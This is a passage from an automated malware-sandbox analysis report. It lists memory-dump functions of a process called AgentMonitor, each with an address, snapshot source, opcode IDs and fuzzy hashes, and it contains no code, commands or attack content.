                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: b7db1b2f2af734889311cbf4a94f04ae6cb7e4c179b366eeadc127a105cbbfdb
                                      • Instruction ID: df302a45c9cfed241d96b0e64ac560b15f78e5a7124691e6cc87eb4329b9a9eb
                                      • Opcode Fuzzy Hash: b7db1b2f2af734889311cbf4a94f04ae6cb7e4c179b366eeadc127a105cbbfdb
                                      • Instruction Fuzzy Hash: 92416EA2A4D6B54EE306BB78E0AA1FD7F84EF45334B2445FFD94EC7093DD0868528291
                                      Function 00007FFB4AE10960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 3c356cac85a30c3315b0e1317f9a6c96ce2a30c1a40720fb6bde3d4d836e8d0b
                                      • Instruction ID: 5987d5cd6329aa09c5e248eba8ce66567a83d38e1ad2acab5fe787621fb200ca
                                      • Opcode Fuzzy Hash: 3c356cac85a30c3315b0e1317f9a6c96ce2a30c1a40720fb6bde3d4d836e8d0b
                                      • Instruction Fuzzy Hash: 8D3177A1A0EA6A1FF315BB7CE09A1F97BC9EF44321B6401FED80EC71D3CC0868424291
                                      Function 00007FFB4AE10998 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: de676f6c7b32f69f890d4fd985bfe0c64b163934f647213c4c4ae201e70c88d0
                                      • Instruction ID: 54694c397e6248b841a36b0b24102df5583792842aba7c93022b48c4f169716d
                                      • Opcode Fuzzy Hash: de676f6c7b32f69f890d4fd985bfe0c64b163934f647213c4c4ae201e70c88d0
                                      • Instruction Fuzzy Hash: 813104A0B5E9691FE349BA38C0AA6B97BC6FF98211B6401FDD44EC3293DC149C418241
                                      Function 00007FFB4AE43049 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction ID: a22ddae03843cab328321067345e9ea6eab528daaf545d61559a51b261fc2575
                                      • Opcode Fuzzy Hash: 2a3f17b44479a984c710bd232cb0bc6bdb91ca3007d3de7805ef6d649f0c2509
                                      • Instruction Fuzzy Hash: 2FF0656154E7C44FC716EA7488694557F60EF6721174A46EFC045CF1A3DA1D8C89C741
                                      Function 00007FFB4AE41D69 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction ID: e81f38eb0dd38b7ecaa1100520948066fd7da0e4314703f698e60b83ea8287eb
                                      • Opcode Fuzzy Hash: bc37eb80c1b502b9b94822243564995391a6ed96683963647b97d11ada639001
                                      • Instruction Fuzzy Hash: 80F065A154E7D04FCB16AA7488644557F64EF6720174A41EEC055CF1A7DA1DCC45C741
                                      Function 00007FFB4AE23B39 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 2f25fe49d7a184dc323016da05f6dfba3d16729e3f581a1f80cc04399d300f9d
                                      • Instruction ID: 3b482b9fcc3bcccf28723a60726902d8b2dabfb5933007a8dcb7e9b8188fb4c9
                                      • Opcode Fuzzy Hash: 2f25fe49d7a184dc323016da05f6dfba3d16729e3f581a1f80cc04399d300f9d
                                      • Instruction Fuzzy Hash: 33E0656154E7C14FDB19AA7484684547F60EF6724178941EEC055CF197DA1D8C89C741
                                      Function 00007FFB4AE47FF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 0923374b07e7562a50073bc70c4024c6f87ee00ea6365cb7f9c0a44157c86ad6
                                      • Instruction ID: b93b4db01bcfaf825da838150498bcb20557062491ad12b1cd2106eff28bfb05
                                      • Opcode Fuzzy Hash: 0923374b07e7562a50073bc70c4024c6f87ee00ea6365cb7f9c0a44157c86ad6
                                      • Instruction Fuzzy Hash: 64E01AA154E7D04FDB0AAF7488658443FA0EE6B25178B40EEC185CF1F3E62D8C49C711
                                      Function 00007FFB4AE41DF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: c684d71a9b9eeb7e7ae76472557dc958890243a0f70d199c16aa8758a383a113
                                      • Instruction ID: cd78cf4ed60cd66d7890b0e60c129ecb6dc8d58320db06e70792f71a2db1c347
                                      • Opcode Fuzzy Hash: c684d71a9b9eeb7e7ae76472557dc958890243a0f70d199c16aa8758a383a113
                                      • Instruction Fuzzy Hash: 87E01AA154E7E04FCB16AA7488659453FA4EE6B21178A40EEC045CF1A3E62DC84AC741
                                      Function 00007FFB4AE4A879 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 95b29c45fdc390b121aeef7cbf92d142b6629b91a2496aaa5d142149635a457b
                                      • Instruction ID: 380bbaed15bd81d06552504bee7a3d08fe52395b51a7c4703365778288f4c253
                                      • Opcode Fuzzy Hash: 95b29c45fdc390b121aeef7cbf92d142b6629b91a2496aaa5d142149635a457b
                                      • Instruction Fuzzy Hash: 5BE0E56294E7C44FCB1AAA3488699547FA0AE6B21178A40EEC045CB1A3E62D9849C701
                                      Function 00007FFB4AE47F78 Relevance: .3, Instructions: 295COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 81b264cd82a6bbb1825a51c49862bc1cfaef1683aac22f43364d02161b222688
                                      • Instruction ID: 7b6dd8cef57242dce67e5138a1c134b45a80f1f8da9c8de6963d9c87a20ae66f
                                      • Opcode Fuzzy Hash: 81b264cd82a6bbb1825a51c49862bc1cfaef1683aac22f43364d02161b222688
                                      • Instruction Fuzzy Hash: F771EC92B5DE5A0FE6D9FE2C98956B523CDFBF825072402F6D41DC728ADD18DC068380
                                      Function 00007FFB4AE4AE55 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69eae7815319d0d9961436d00aa08d316ea4b8aaeadd631a09a2f10c5d6291e9
                                      • Instruction ID: f7f8a11c776440576a5bd32dc3e5d16d11f16386cb2845de251d513d62344a12
                                      • Opcode Fuzzy Hash: 69eae7815319d0d9961436d00aa08d316ea4b8aaeadd631a09a2f10c5d6291e9
                                      • Instruction Fuzzy Hash: 0631D3E1E5DD6B4FE684FE38C4952B822CDFBA8710BB441F9D05DC3286DD28AC455341
                                      Function 00007FFB4AE10908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Function 00007FFB4AE1116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 92d280af5ab4fb19dd9c619502cd8c42ecac9c2b68ee233eb1242228bcecb6ee
                                      • Instruction ID: f42d02f9dab7a1615d68c604c92a4c82c49cdee82e5d6f6c7b6596049a97871a
                                      • Opcode Fuzzy Hash: 92d280af5ab4fb19dd9c619502cd8c42ecac9c2b68ee233eb1242228bcecb6ee
                                      • Instruction Fuzzy Hash: BE31AF71A0D65A8FDB45FF78C8549B97BE0FF59310B2406FAC01AC72A3DB29A441CB40
                                      Function 00007FFB4AE10C25 Relevance: .1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 673e5f9744fe627961f8af8a7297823dc1d7a3afdef8ee5b231e9e1e3d5adcf6
                                      • Instruction ID: 974b50c8666947e9088af8039315baf181a23fec360c5d113aa71021d0657cf3
                                      • Opcode Fuzzy Hash: 673e5f9744fe627961f8af8a7297823dc1d7a3afdef8ee5b231e9e1e3d5adcf6
                                      • Instruction Fuzzy Hash: 4811C0B5A4C66A8BF312BF34C9112BC7F64EF42364F3581F2C0558B1C2D92825478B91
                                      Function 00007FFB4AE424E6 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c4d1de91371de7651a93a91e686d7fa64bebee0abf1000acb797bfe732cf2df
                                      • Instruction ID: 0da0749e4babb60c977ee95d142dab22574323a8aa5ad0c9ec6bcfb7678ba7c6
                                      • Opcode Fuzzy Hash: 0c4d1de91371de7651a93a91e686d7fa64bebee0abf1000acb797bfe732cf2df
                                      • Instruction Fuzzy Hash: 5D01C4B2E4C92A8FE794FE68C8643B87399FB54310F2502F9D45DCB2C7DD2868458782
                                      Function 00007FFB4AE4D4FC Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd930c0bb7ca0393eab2454cf02f2afe75798756c9e79b4a3eaa7581c0a9387c
                                      • Instruction ID: cffb09e75046ea86aca1f9c72278a97e7f8740ad1ba950986e91ed4d74ae0e91
                                      • Opcode Fuzzy Hash: fd930c0bb7ca0393eab2454cf02f2afe75798756c9e79b4a3eaa7581c0a9387c
                                      • Instruction Fuzzy Hash: CE01DEB1F084298BEB54FD28D9853FD32EEFB94314F3440B1C01A96188CE3DD8428B41
                                      Function 00007FFB4AE240A6 Relevance: .0, Instructions: 40COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88516daad632293a93547c8fba1888a60bfc3fb4238cc1bc514e6fd9e1b6c628
                                      • Instruction ID: fedc971d5c64cbeab27e7f081e154e876007477c202db5d9ae14e3b4443d37ce
                                      • Opcode Fuzzy Hash: 88516daad632293a93547c8fba1888a60bfc3fb4238cc1bc514e6fd9e1b6c628
                                      • Instruction Fuzzy Hash: C601B1B2A1DA0B8BE715FF68C8645FD7BA5FB44310F2002B6C02AC7195DF7829048782
                                      Function 00007FFB4AE24081 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bbc61abb554ea412ad5da9d462ddf029576f3a0e470d25a6d053c6746bbb80f8
                                      • Instruction ID: e0847f058e5e534274fb606a2ad8f783155560c0ee61297fea8444402b3d65c2
                                      • Opcode Fuzzy Hash: bbc61abb554ea412ad5da9d462ddf029576f3a0e470d25a6d053c6746bbb80f8
                                      • Instruction Fuzzy Hash: 2201A7B1A18A1B8AEB15FF58C8246FE77B4FF04314F604276D026872C4CFB465458782
                                      Function 00007FFB4AE25DB5 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f097daabbc8ee3e3ab152785e146924e1959c0646ef6c31de92dcfaf2e3bdea1
                                      • Instruction ID: 1c843b7006537c13c760a471cf0a39a1bc79aee245b9e8a77b0a2e38e88a3c56
                                      • Opcode Fuzzy Hash: f097daabbc8ee3e3ab152785e146924e1959c0646ef6c31de92dcfaf2e3bdea1
                                      • Instruction Fuzzy Hash: BA01A5B0D5C92D8FDBD4FF18C895BA9B6A1FB68300F2042E5D01DD3241CE3869858F41
                                      Function 00007FFB4AE249AB Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction ID: 2ea1fe3ee4721c6ac62d3cbdf494fea951a6b4f256d9f848cf8c1f432781f854
                                      • Opcode Fuzzy Hash: 33ad95c031b5cb018e629114cb2faec1cf01f8ee115a59977accfe8bff6c84a0
                                      • Instruction Fuzzy Hash: 9FF054B2A5C95B4BF755BE2CD9606B93298FF19310F3542F5E43DC71C6EE28E8014682
                                      Function 00007FFB4AE10B77 Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19554bb4175620f9de3e3ce8066df88a5f0c2b5c0b49f4a0c3191cf8be6b3ef7
                                      • Instruction ID: 8b41a40c0d551346ee7a166067a75d230b3a08b906b5a3bdc6ce04d588864a3f
                                      • Opcode Fuzzy Hash: 19554bb4175620f9de3e3ce8066df88a5f0c2b5c0b49f4a0c3191cf8be6b3ef7
                                      • Instruction Fuzzy Hash: 3BF0A03515DA55CFC742EB3CC8E58D5BF60FF02205B9A01FAD089CB5A2D315585ECB41
                                      Function 00007FFB4AE4A7E9 Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction ID: eb08d1d0e9e519e8c34edc9bc61880866140a6f7e2ac57b6a0f11600102a4089
                                      • Opcode Fuzzy Hash: 970110386a28ea33e9809645a5f1e35a4c155356219b7c1b0415452638871267
                                      • Instruction Fuzzy Hash: 00F0E522B4DBC84FC729AA2D4869061BFF5DB9B21234941FFC496C72E3ED58AC858341
                                      Function 00007FFB4AE4B75F Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0df9f49fff77072b33b7521290818dd35090f236c1f0b0ecee3a3133567e81a3
                                      • Instruction ID: 744dc422681f153ed809004df15aaf6aec155ca92c04f14dcd60f1bfb43c94a6
                                      • Opcode Fuzzy Hash: 0df9f49fff77072b33b7521290818dd35090f236c1f0b0ecee3a3133567e81a3
                                      • Instruction Fuzzy Hash: E5E09291B1AD0D4A9B8DFB3CA4955FD6381EBA822131043B7DC0EC214FDD28986A8380
                                      Function 00007FFB4AE4A379 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction ID: dd883564e53e479445ebf6156c541233331ba38a00a062757bf747cc0926c757
                                      • Opcode Fuzzy Hash: fd2acc4e6946023a8cb6fad64d094354f4de3d9796f7a4bc323960c71169f6bb
                                      • Instruction Fuzzy Hash: E0E02B7150E7C04FC705AA3484594947FA0EFA721134942EFC045CF1E3EA2CCC89C700
                                      Function 00007FFB4AE4A2E9 Relevance: .0, Instructions: 30COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction ID: 1bab3d9375fd886bab1a6da384e0890cf31466f9860bcf7a427805b36666ecb0
                                      • Opcode Fuzzy Hash: 8910096e4b25cd96ab5b91bd47d4cd416830b5c2c8e4fe302a4996d8faa950f5
                                      • Instruction Fuzzy Hash: 14F0E57150E7C04FC706AA3888294507FA0EF6721134A46EFC045CF1E3EA2D8C88C701
                                      Function 00007FFB4AE10C6C Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae10000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Function 00007FFB4AE47764 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction ID: 7d9b2f4199c3c34ede9515398215e465beb115fe01245bc273b6c29d1eed1104
                                      • Opcode Fuzzy Hash: bc806d25676570f801b33c6ec84c7e6d88e510a59ceee20cd12a259cc2dd60c3
                                      • Instruction Fuzzy Hash: 5CE0E56198E7D04FC74B9B7488688947FB4EE5722178A84EEC0898F1E3D669984AC742
                                      Function 00007FFB4AE4D679 Relevance: .0, Instructions: 24COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction ID: 437ef8355eb90a2483f1e29550f55d8ce66b73da8277851049454e5fcd509aa5
                                      • Opcode Fuzzy Hash: c315b5d5c893c893f62e841b520169d6e99c76195995479546504b0431bfa4e3
                                      • Instruction Fuzzy Hash: 46E01A6284E7C04FCB0A9A7488A88903F64EF6721179A40EBC045CF5A3D9198849C701
                                      Function 00007FFB4AE25318 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 162256fb4bdedd09d5557309124cba62a27418c9cc92d47c4feb75015d5e9647
                                      • Instruction ID: 35c1fbf9815b44137489b32477c49ebbbde48bcefd900287d78541d5175759fd
                                      • Opcode Fuzzy Hash: 162256fb4bdedd09d5557309124cba62a27418c9cc92d47c4feb75015d5e9647
                                      • Instruction Fuzzy Hash: 5FD05E30B60A094B8B0CBA3D8458470B3D5F7AA20A7E452B8940BC3281ED25ECC6CB80
                                      Function 00007FFB4AE25628 Relevance: .0, Instructions: 23COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 104d35c327f08b0f4eaa2cfba5ab88525c4c97b4b9ea366e14b0f4f636863a58
                                      • Instruction ID: 518f4f61de929999dd4af6b3069263342903ccf361f0a1ca97ef2d48025ae98f
                                      • Opcode Fuzzy Hash: 104d35c327f08b0f4eaa2cfba5ab88525c4c97b4b9ea366e14b0f4f636863a58
                                      • Instruction Fuzzy Hash: 87D05E30B609094B8B0CBA3D8858570B3D5FBAA2067A452B8940BC2281ED25ECC68B80
                                      Function 00007FFB4AE4A390 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_38_2_7ffb4ae41000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                      Function 00007FFB4AE4A300 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000026.00000002.1929747733.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
